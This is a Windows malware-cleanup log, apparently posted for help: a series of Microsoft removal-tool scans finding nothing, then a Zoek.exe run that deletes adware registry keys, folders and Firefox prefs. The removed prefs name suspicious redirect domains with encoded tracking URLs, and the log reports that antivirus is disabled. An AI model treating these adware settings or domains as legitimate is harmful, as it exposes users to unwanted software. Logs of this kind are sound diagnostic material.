Microsoft Windows Malicious Software Removal Tool Finished On Thu Jan 16 03:04:27 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.9, February 2014 (build 5.9.9902.0)
Started On Sun Feb 16 03:00:58 2014

Engine: 1.1.10201.0
Signatures: 1.165.3163.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Feb 16 03:03:41 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.10, March 2014 (build 5.10.10001.0)
Started On Wed Mar 19 03:01:02 2014

Engine: 1.1.10302.0
Signatures: 1.167.1001.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Mar 19 03:04:03 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.11, April 2014 (build 5.11.10100.0)
Started On Thu Apr 10 03:02:06 2014

Engine: 1.1.10401.0
Signatures: 1.169.1258.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Apr 10 03:04:37 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.12, May 2014 (build 5.12.10200.0)
Started On Thu May 15 03:02:55 2014

Engine: 1.1.10502.0
Signatures: 1.173.1305.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu May 15 03:05:29 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.13, June 2014 (build 5.13.10300.0)
Started On Thu Jun 12 03:05:26 2014

Engine: 1.1.10600.0
Signatures: 1.175.1113.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jun 12 03:07:31 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.14, July 2014 (build 5.14.10402.0)
Started On Wed Jul 09 03:02:37 2014

Engine: 1.1.10701.0
Signatures: 1.177.949.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Jul 09 03:05:04 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.15, August 2014 (build 5.15.10500.0)
Started On Thu Aug 14 03:07:02 2014

Engine: 1.1.10802.0
Signatures: 1.179.1796.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Aug 14 03:12:18 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.16, September 2014 (build 5.16.10602.0)
Started On Fri Sep 12 03:02:57 2014

Engine: 1.1.10904.0
Signatures: 1.183.882.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Fri Sep 12 03:10:56 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.17, October 2014 (build 5.17.10700.0)
Started On Thu Oct 16 03:00:46 2014

Engine: 1.1.11005.0
Signatures: 1.185.2035.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Oct 16 03:08:17 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.18, November 2014 (build 5.18.10802.0)
Started On Thu Nov 13 03:03:00 2014

Engine: 1.1.11104.0
Signatures: 1.187.1116.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Nov 13 03:09:26 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.19, December 2014 (build 5.19.10902.0)
Started On Thu Dec 11 03:07:14 2014

Engine: 1.1.11202.0
Signatures: 1.189.872.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Dec 11 03:14:26 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.20, January 2015 (build 5.20.11000.0)
Started On Wed Jan 14 22:39:49 2015

Engine: 1.1.11302.0
Signatures: 1.191.1276.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Jan 14 22:55:00 2015


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.20, January 2015 (build 5.20.11000.0)
Started On Thu Jan 22 19:23:42 2015

Engine: 1.1.11302.0
Signatures: 1.191.1276.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jan 22 19:37:46 2015


Return code: 0 (0x0)



#################################################################################################################
ZOEK:

Zoek.exe v5.0.0.0 Updated 18-01-2015
Tool run by Admin on Thu 01/22/2015 at 19:58:39.83.
Microsoft Windows 7 Home Premium  6.1.7601 Service Pack 1 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\Admin\Desktop\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

1/22/2015 7:59:55 PM Zoek.exe System Restore Point Created Succesfully.

==== Empty Folders Check ======================

C:\PROGRA~2\Malwarebytes' Anti-Malware deleted successfully
C:\PROGRA~2\COMMON~1\Symantec Shared deleted successfully
C:\Program Files\McAfee deleted successfully
C:\Users\Bonnie\AppData\Roaming\Malwarebytes deleted successfully
C:\Users\Bonnie\AppData\Roaming\ZoomBrowser EX deleted successfully
C:\Users\Admin\AppData\Local\VirtualStore deleted successfully
C:\Users\Bonnie\AppData\Local\{17D99C2E-A749-40CB-9D49-D905482C7B57} deleted successfully
C:\Users\Bonnie\AppData\Local\{1B37582B-3250-46F5-A02E-0E6943BCAE9F} deleted successfully
C:\Users\Bonnie\AppData\Local\{2AA6E6AB-09C2-49A8-A318-9B10004A471A} deleted successfully
C:\Users\Bonnie\AppData\Local\{2E838CBA-D2D2-40B8-A487-31DF38890964} deleted successfully
C:\Users\Bonnie\AppData\Local\{2FDE10A0-B070-41F6-B345-7421053C8EB5} deleted successfully
C:\Users\Bonnie\AppData\Local\{3458B4CB-A738-41AB-B0CA-993B17B2B8DD} deleted successfully
C:\Users\Bonnie\AppData\Local\{3AC1F703-8146-44EA-AA81-3E3BAF030DF9} deleted successfully
C:\Users\Bonnie\AppData\Local\{4D086ECD-C43E-447B-8F69-BF18803E5D01} deleted successfully
C:\Users\Bonnie\AppData\Local\{53CB011D-5BA0-4AD9-9FC4-CA605743B036} deleted successfully
C:\Users\Bonnie\AppData\Local\{55E1AF3A-5A85-4E10-A5E9-241B2BDA9485} deleted successfully
C:\Users\Bonnie\AppData\Local\{68CAC9F9-76A4-4655-9F26-34D0314692DF} deleted successfully
C:\Users\Bonnie\AppData\Local\{7310EB10-EC69-4B3D-A309-A54596BBAC7E} deleted successfully
C:\Users\Bonnie\AppData\Local\{73F33929-773E-4D79-B9F8-677553ADA145} deleted successfully
C:\Users\Bonnie\AppData\Local\{88A7AB80-6ECA-4B8F-A416-05EF418B39D6} deleted successfully
C:\Users\Bonnie\AppData\Local\{97659943-31E8-4018-BB4F-16A2A8B17C97} deleted successfully
C:\Users\Bonnie\AppData\Local\{A304BBB8-FDA1-4327-98AB-1DB834BBF335} deleted successfully
C:\Users\Bonnie\AppData\Local\{ABB457B3-39C3-4840-A47D-25C6C01BF0D6} deleted successfully
C:\Users\Bonnie\AppData\Local\{B6A55282-A7A4-465B-9F72-416CF3271FA9} deleted successfully
C:\Users\Bonnie\AppData\Local\{CF3829DA-E92B-4B16-90E7-36BB3427FF18} deleted successfully
C:\Users\Bonnie\AppData\Local\{E738D565-A94B-4F4D-BD01-AF58D216B0A8} deleted successfully
C:\Users\Bonnie\AppData\Local\{E9B08722-28C4-4B96-B477-87C1619B9F7C} deleted successfully
C:\Users\Bonnie\AppData\Local\{EC7E2237-1FE7-4618-BF6A-08A992DB70FC} deleted successfully
C:\Users\Bonnie\AppData\Local\{F883D3A9-FA9F-404D-B551-5E4FEFB8E2C8} deleted successfully

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1008\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1008\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2E422264-6D8A-4ca0-97C7-A2CF868471EA} deleted successfully
HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A5AA24EA-11B8-4113-95AE-9ED71DEAF12A} deleted successfully
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_CLASSES_ROOT\CLSID\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully

==== Deleting CLSID Registry Values ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} deleted successfully

==== Running Processes ======================

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe
C:\Program Files (x86)\Gateway\Registration\GREGsvc.exe
C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Program Files (x86)\Nero\Update\NASvc.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe
C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
C:\Program Files (x86)\Browny02\BrYNSvc.exe
C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
C:\Users\Admin\Desktop\zoek.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe

==== Deleting Services ======================


==== FireFox Fix ======================

Deleted from C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default\prefs.js:

Added to C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");

Deleted from C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default\prefs.js:
user_pref("browser.search.order.1", "Secure Search");
user_pref("keyword.URL", "");

Added to C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");

ProfilePath: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default

user.js not found
---- Lines browser.startup.page removed from prefs.js ----
user_pref("browser.startup.page", 3);
---- FireFox user.js and prefs.js backups ----

prefs_20150122_0813_.backup

ProfilePath: C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default

user.js not found
---- Lines nspdl removed from prefs.js ----
user_pref("extensions.nspdl.data._dy", "20140623");
user_pref("extensions.nspdl.data.activeDate", "20140515");
user_pref("extensions.nspdl.data.aliveDate", "20140623");
user_pref("extensions.nspdl.data.cc", "us");
user_pref("extensions.nspdl.data.instlDate", "20140422");
user_pref("extensions.nspdl.data.ntopen", "23336556");
user_pref("extensions.nspdl.data.ra-0dd39926325c08d27482ec7852a60095", "dd35d321d1bed7ac906b12cfbe195074");
user_pref("extensions.nspdl.data.ra-462f23bb747e4f70407d053a3297bd0b", "832d47846367971f1f4dfabb314ad640");
user_pref("extensions.nspdl.data.ra-65b71db09f71c6c7d7b2071c59e0da25", "7a658d50963fcf43fbc6e68c0bb5525e");
user_pref("extensions.nspdl.data.ra-872bb23eeaa531e88719b185b415ff36", "df2139a99645b74952aa7fce5f169ab0");
user_pref("extensions.nspdl.data.ra-abc402c70e46e8cc70f0532c455a3c97", "026cde5b6cd59e1f55166cdd3bca3e0b");
user_pref("extensions.nspdl.general.content", "favorites-e3fe6b04f35b134b72f2f0e12ac60849");
user_pref("extensions.nspdl.general.firstRun", false);
user_pref("extensions.nspdl.general.guid", "d38dff45-a78b-45b4-92ec-7cdd9483a221");
user_pref("extensions.nspdl.general.version", "9.5.5");
---- Lines valueApps removed from prefs.js ----
user_pref("valueApps.autoDisableScopes", -1);
user_pref("valueApps.storage.mam_gk_userId", "64333531636537372D623135652D343266622D396364332D633636653163363162376133");
---- Lines browser.startup.page removed from prefs.js ----
user_pref("browser.startup.page", 3);
---- Lines extensions.FXNqB removed from prefs.js ----
user_pref("extensions.FXNqB.epoch", "1416953868");
user_pref("extensions.FXNqB.url", "http://webdireect.in/sync2/?q=hfZ9ojtUhMCMCyVUojwMg708BNmGWj8lkGhGheDUojw9rdkGqdw8qjaEpihIC7n0rjnEpjw5rda9qTs5tNhVC
---- Lines extensions.HhBhxJjRP4nqBBXi removed from prefs.js ----
user_pref("extensions.HhBhxJjRP4nqBBXi.epoch", "1421389269");
user_pref("extensions.HhBhxJjRP4nqBBXi.url", "http://liversitions.info/sync2/?q=hfZ9ofmZhchEAen0rjaErdaEtMqLDe49CNU0llrMCMlNhd9FqjaFrdCErTnHrdrMBzqUoj
---- Lines extensions.VDIQKPIG4 removed from prefs.js ----
user_pref("extensions.VDIQKPIG4.epoch", "1416953870");
user_pref("extensions.VDIQKPIG4.url", "http://discountgetdirect.ru/sync2/?q=hfZ9oeZMh7Y4tNbPhd9FtMqLDe49CNU0llrMCMlNhd9Fqda9rjgEqTs9rdrMBzqUojw9rdUFpd
---- Lines extensions.jQuh426B1 removed from prefs.js ----
user_pref("extensions.jQuh426B1.epoch", "1421389270");
user_pref("extensions.jQuh426B1.url", "http://redhatlovesite.org/sync2/?q=hfZ9ojwGhyhNtNbPhd9FtMqLDe49CNU0llrMCMlNhd9Fqda4rjkFpjk9qjwMBzqUojw9rdUFpdaE
---- Lines extensions.q5lnQceM removed from prefs.js ----
user_pref("extensions.q5lnQceM.epoch", "1416953869");
user_pref("extensions.q5lnQceM.url", "http://foreveryshare.ru/sync2/?q=hfZ9oeDGhex9tNbPhd9FtMqLDe49CNU0llrMCMlNhd9Fqda9rdCGrHr9qdrMBzqUojw9rdUFpdaEqdC
---- Lines extensions.s6ldIyuuS removed from prefs.js ----
user_pref("extensions.s6ldIyuuS.epoch", "1421389269");
user_pref("extensions.s6ldIyuuS.url", "http://astrajobsecure.com/sync2/?q=hfZ9ojwEhfsHtNbPhd9FtMqLDe49CNU0llrMCMlNhd9Fqda4rjkFpjr9rdnMBzqUojw9rdUFpdaE
---- Lines extensions.uAk3as removed from prefs.js ----
user_pref("extensions.uAk3as.epoch", "1416953870");
user_pref("extensions.uAk3as.url", "http://capelivemega.net/sync2/?q=hfZ9ojlVCTsMCyVUojwMg708BNmGWj8lkGhGheDUojw9rdCFrdsErjrGpihIC7n0rjnEpjw5rda9qHaGt
---- Lines extensions.zOhdwnYKopX6lVWl removed from prefs.js ----
user_pref("extensions.zOhdwnYKopX6lVWl.epoch", "1421389271");
user_pref("extensions.zOhdwnYKopX6lVWl.url", "http://getjpi77.info/sync2/?q=hfZ9oen9BihEAen0rchTB6lKDzt4olljtNtVh7n0rjnFrjsHrjsHqTr9tMFHhd9FqdwFrTnGrT
---- FireFox user.js and prefs.js backups ----

prefs_20150122_0813_.backup

==== Deleting Files \ Folders ======================

C:\Users\Bonnie\AppData\LocalLow\{01050D05-D546-B8DC-954D-8334A8A7BF5A} deleted
C:\Users\Bonnie\AppData\LocalLow\{2F344960-763E-9E6C-E973-25241A34D54E} deleted
C:\Users\Bonnie\AppData\LocalLow\{AF9DD42F-F7CD-768B-3561-2FF97518D379} deleted
C:\Users\Bonnie\AppData\LocalLow\{B4552D3D-6B41-9AF1-3067-72A066972344} deleted
C:\Users\Bonnie\AppData\Local\Packages\windows_ie_ac_001\AC\{01050D05-D546-B8DC-954D-8334A8A7BF5A} deleted
C:\Users\Bonnie\AppData\Local\Packages\windows_ie_ac_001\AC\{2F344960-763E-9E6C-E973-25241A34D54E} deleted
C:\Users\Bonnie\AppData\Local\Packages\windows_ie_ac_001\AC\{AF9DD42F-F7CD-768B-3561-2FF97518D379} deleted
C:\Users\Bonnie\AppData\Local\Packages\windows_ie_ac_001\AC\{B4552D3D-6B41-9AF1-3067-72A066972344} deleted
C:\PROGRA~2\WordPerfect Office 12 deleted
C:\PROGRA~2\FamilySearch deleted
C:\Users\Bonnie\AppData\Roaming\WB.CFG deleted
C:\Users\Bonnie\AppData\Roaming\appdataFr2.bin deleted
C:\Users\Bonnie\AppData\Local\CRE deleted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FamilySearch deleted
C:\Users\Bonnie\AppData\LocalLow\TB deleted
C:\Windows\SysNative\config\systemprofile\Searches deleted
C:\windows\SysNative\GroupPolicy\ADM deleted
C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default\nspdl deleted

==== System Specs ======================

Windows: Windows 7 Home Premium Edition (64-bit) Service Pack 1 (Build 7601)
Memory (RAM): 5888 MB
CPU Info: AMD Phenom(tm) II X6 1065T Processor
CPU Speed: 2971.9 MHz
Sound Card: Realtek Digital Output (Realtek |
Display Adapters: ATI Radeon HD 4250 Graphics  | ATI Radeon HD 4250 Graphics  | RDPDD Chained DD | RDP Encoder Mirror Driver | RDP Reflector Display Driver
Monitors: 1x; Generic PnP Monitor |
Screen Resolution: 1680 X 1050 - 32 bit
Network: Network Present
Network Adapters: 802.11n Wireless LAN Card | Realtek PCIe GBE Family Controller
CD / DVD Drives: 1x (D: | ) D: ATAPI   DVD A  DH16ABSH
Ports: COM Ports NOT Present. LPT Port NOT Present.
Mouse: 3 Button Wheel Mouse Present
Hard Disks: C:  1379.2GB
Hard Disks - Free: C:  1197.7GB
Manufacturer *: American Megatrends Inc.
BIOS Info: AT/AT COMPATIBLE | 08/16/32 | ACRSYS - 20101104
Time Zone: Mountain Standard Time
Motherboard *: Gateway DX4350
Country: United States
Language: ENU

==== System Specs (Software) ======================

Anti-Virus: Kaspersky Internet Security On-access scanning disabled (Outdated)
Anti-Spyware: Kaspersky Internet Security disabled (Outdated)
Anti-Spyware: Windows Defender disabled (Outdated)
Firewall: Kaspersky Internet Security disabled
Default Browser: Firefox   35.0
Internet Explorer Version: 11.0.9600.17501
Mozilla Firefox version: 35.0 (x86 en-US)
Adobe Reader version: 10.1.13.16
Flash Player version: 16.0.0.257

==== Files Recently Created / Modified ======================

====== C:\Windows ====
====== C:\Users\Admin\AppData\Local\Temp ====
2015-01-23 02:07:17   E0DC8C6BBC787B972A9A468648DBFD85   1008128   ----a-w-   C:\Users\Admin\AppData\Local\Temp\jrt\libiconv2.dll
2015-01-23 02:07:17   D202BAA425176287017FFE1FB5D1B77C   103424   ----a-w-   C:\Users\Admin\AppData\Local\Temp\jrt\libintl3.dll
2015-01-23 02:07:17   57CAC848FA14AE38F14F9441F8933282   140288   ----a-w-   C:\Users\Admin\AppData\Local\Temp\jrt\pcre3.dll
2015-01-23 02:07:17   547C43567AB8C08EB30F6C6BACB479A3   79360   ----a-w-   C:\Users\Admin\AppData\Local\Temp\jrt\regex2.dll
2015-01-23 02:07:17   2E0323A94915FAAB10A25F3BABF82584   157696   ----a-w-   C:\Users\Admin\AppData\Local\Temp\jrt\erunt\ERUNT.EXE
2015-01-23 02:00:57   97511FE2CA09CC2E06C3CD6519C3494E   43008   ----a-w-   C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpi9q42z.dll
====== Java Cache =====
====== C:\Windows\SysWOW64 =====
2015-01-15 05:38:26   FE48346938C1CDDDF4E4097DB9B99764   52224   ----a-w-   C:\Windows\SysWOW64\nlaapi.dll
2015-01-15 05:38:26   92940397DFFB4D237EA5BB22FF912BDC   156672   ----a-w-   C:\Windows\SysWOW64\ncsi.dll
2015-01-15 05:38:01   2AF481C03C0383ADE09FFEDA0C583140   3971512   ----a-w-   C:\Windows\SysWOW64\ntkrnlpa.exe
2015-01-15 05:38:00   9606307F5E1EABA98ACB61206EFC2127   43008   ----a-w-   C:\Windows\SysWOW64\srclient.dll
2015-01-15 05:38:00   8A289EF0AE709327D6AA9769E108B5A6   3916728   ----a-w-   C:\Windows\SysWOW64\ntoskrnl.exe
2015-01-15 05:37:34   0C9988BDA3CEC3C421B773982C5E2EC6   5703168   ----a-w-   C:\Windows\SysWOW64\mstscax.dll
2015-01-13 14:53:00   8DEEE20D8D30E9B0FBDCA31E58A027BD   53248   ----a-w-   C:\Windows\SysWOW64\tsgqec.dll
2015-01-13 14:52:59   AB5EFB103DB01C1912C9D2F545EA5621   17920   ----a-w-   C:\Windows\SysWOW64\wksprtPS.dll
2015-01-13 14:52:59   5E676B296B762E211D83B87635F2C330   855552   ----a-w-   C:\Windows\SysWOW64\rdvidcrl.dll
2015-01-13 14:52:59   4676AAA9DDF52A50C829FEDB4EA81E54   1068544   ----a-w-   C:\Windows\SysWOW64\mstsc.exe
2015-01-13 14:52:59   2EFB1279E7BEA7D12D9F4D6508D27880   50176   ----a-w-   C:\Windows\SysWOW64\MsRdpWebAccess.dll
2015-01-13 14:51:47   8999F18D38D55E34D356796507FFD639   192000   ----a-w-   C:\Windows\SysWOW64\rdpendp_winip.dll
====== C:\Windows\SysWOW64\drivers =====
====== C:\Windows\Sysnative =====
2015-01-15 05:38:26   B6A58491307B4CADA572583D863DC602   210432   ----a-w-   C:\Windows\Sysnative\profsvc.dll
2015-01-15 05:38:26   8B301D474B478E9A92823BAB50A7BC49   303616   ----a-w-   C:\Windows\Sysnative\nlasvc.dll
2015-01-15 05:38:18   E9CB5F138943D383DB67F29AAB60453F   3179520   ----a-w-   C:\Windows\Sysnative\rdpcorets.dll
2015-01-15 05:38:18   2147C5330F983D76A36B73F4A804F778   16384   ----a-w-   C:\Windows\Sysnative\RdpGroupPolicyExtension.dll
2015-01-15 05:38:06   2A9C3ADBC3B9D061CACDEFFBED67683C   87040   ----a-w-   C:\Windows\Sysnative\TSWbPrxy.exe
2015-01-15 05:38:01   0A70B8D78AF95894E221DDAC6482DF6D   5553592   ----a-w-   C:\Windows\Sysnative\ntoskrnl.exe
2015-01-15 05:38:00   F4846789B3795F14DCB7D92ED1DAF74F   503808   ----a-w-   C:\Windows\Sysnative\srcore.dll
2015-01-15 05:38:00   DE595EACC79006E7B15B848BF0831E78   296960   ----a-w-   C:\Windows\Sysnative\rstrui.exe
2015-01-15 05:38:00   BA6D609BAB615991E8791CA1DFFD034C   50176   ----a-w-   C:\Windows\Sysnative\srclient.dll
2015-01-15 05:37:34   6DD73E4E947DB3B0608321AE13210D94   6584320   ----a-w-   C:\Windows\Sysnative\mstscax.dll
2015-01-13 14:53:01   DDED7C5558B3AE09F568945281A9A6D1   44544   ----a-w-   C:\Windows\Sysnative\TsUsbGDCoInstaller.dll
2015-01-13 14:53:00   FEC6178962DFF33074D39CA907971405   12800   ----a-w-   C:\Windows\Sysnative\TsUsbRedirectionGroupPolicyExtension.dll
2015-01-13 14:53:00   5289A00E2D21BB3A7D6761646543ED5C   62976   ----a-w-   C:\Windows\Sysnative\tsgqec.dll
2015-01-13 14:53:00   108C257D765AAD2E6EC46557DA0B02BD   13824   ----a-w-   C:\Windows\Sysnative\TsUsbRedirectionGroupPolicyControl.exe
2015-01-13 14:52:59   A4420969E5AB94856E5C0C02E6099D3F   1057280   ----a-w-   C:\Windows\Sysnative\rdvidcrl.dll
2015-01-13 14:52:59   8E75B1112C374EBDF18FD640DA2F0655   1147392   ----a-w-   C:\Windows\Sysnative\mstsc.exe
2015-01-13 14:52:59   7BD2E6E2458A5B95F8341244C7FC7DD4   18944   ----a-w-   C:\Windows\Sysnative\wksprtPS.dll
2015-01-13 14:52:59   79EE5ECB4BE89343E4CF1E48F7769F59   420864   ----a-w-   C:\Windows\Sysnative\wksprt.exe
2015-01-13 14:52:59   149A388C17F04AD1F99B477A43BE1A9F   56832   ----a-w-   C:\Windows\Sysnative\MsRdpWebAccess.dll
2015-01-13 14:51:47   D346E07D62E3D4BEAB040939744EC31B   228864   ----a-w-   C:\Windows\Sysnative\rdpendp_winip.dll
2015-01-13 14:51:47   AD4D0AEDB5993EDA31EB80A54EDBC344   243200   ----a-w-   C:\Windows\Sysnative\rdpudd.dll
====== C:\Windows\Sysnative\drivers =====
2015-01-21 06:30:17   FD44FA80DA03EA144153A76DEBBB61B4   35064   ----a-w-   C:\Windows\Sysnative\drivers\TrueSight.sys
2015-01-15 05:38:23   AE3334958D8F631FF14A0AEB3D7EFB3A   141312   ----a-w-   C:\Windows\Sysnative\drivers\mrxdav.sys
2015-01-13 14:53:00   E9981ECE8D894CEF7038FD1D040EB426   56832   ----a-w-   C:\Windows\Sysnative\drivers\TsUsbFlt.sys
2015-01-13 14:51:54   AD64450A4ABE076F5CB34CC08EEACB07   30208   ----a-w-   C:\Windows\Sysnative\drivers\TsUsbGD.sys
2015-01-13 14:51:54   313F68E1A3E6345A4F47A36B07062F34   19456   ----a-w-   C:\Windows\Sysnative\drivers\rdpvideominiport.sys
2015-01-07 02:51:42   26C43960C99EE861A5D0EDC4DCF3B1C3   129752   ----a-w-   C:\Windows\Sysnative\drivers\67F23A27.sys
2015-01-07 02:50:39   26C43960C99EE861A5D0EDC4DCF3B1C3   129752   ----a-w-   C:\Windows\Sysnative\drivers\12D43959.sys
====== C:\Windows\Tasks ======
2015-01-04 17:45:22   B63AD96D5AB77552EFDB7D2277C3B0CB   3886   ----a-w-   C:\Windows\Sysnative\Tasks\Adobe Acrobat Update Task
====== C:\Windows\Temp ======
======= C:\Program Files =====
======= C:\PROGRA~2 =====
2015-01-19 18:13:20   --------   d-----w-   C:\PROGRA~2\ERUNT
=======  =====
====== C:\Users\Admin\AppData\Roaming ======
2015-01-22 05:29:31   --------   d-----w-   C:\Users\Admin\AppData\Roaming\Mozilla
2015-01-22 05:29:31   --------   d-----w-   C:\Users\Admin\AppData\Local\Mozilla
2015-01-22 05:29:17   --------   d-----w-   C:\Users\Admin\AppData\Roaming\ATI
2015-01-22 05:29:17   --------   d-----w-   C:\Users\Admin\AppData\Local\ATI
2015-01-22 05:28:37   --------   d-----w-   C:\Users\Admin\AppData\Roaming\OEM
2015-01-22 05:28:37   --------   d-----w-   C:\Users\Admin\AppData\Roaming\ControlCenter4
2015-01-22 05:28:37   --------   d-----w-   C:\Users\Admin\AppData\Roaming\Apple Computer
2015-01-22 05:28:36   450364B2CEFFCE88126C0F9B36C843D3   438944   ----a-w-   C:\Users\Admin\AppData\Local\GDIPFONTCACHEV1.DAT
2015-01-22 05:28:14   --------   d-----w-   C:\Users\Admin\AppData\Roaming\Identities
2015-01-21 06:32:33   --------   d-sh--w-   C:\Users\Admin\AppData\Local\EmieUserList
2015-01-21 06:32:33   --------   d-sh--w-   C:\Users\Admin\AppData\Local\EmieSiteList
2015-01-21 06:32:33   --------   d-sh--w-   C:\Users\Admin\AppData\Local\EmieBrowserModeList
2015-01-21 06:32:32   --------   d-----w-   C:\Users\Admin\AppData\Roaming\Adobe
2015-01-21 06:30:16   --------   d-s---w-   C:\Users\Admin\AppData\Locallow\Microsoft
2015-01-17 22:48:11   --------   d-----r-   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2015-01-17 22:48:11   --------   d-----r-   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
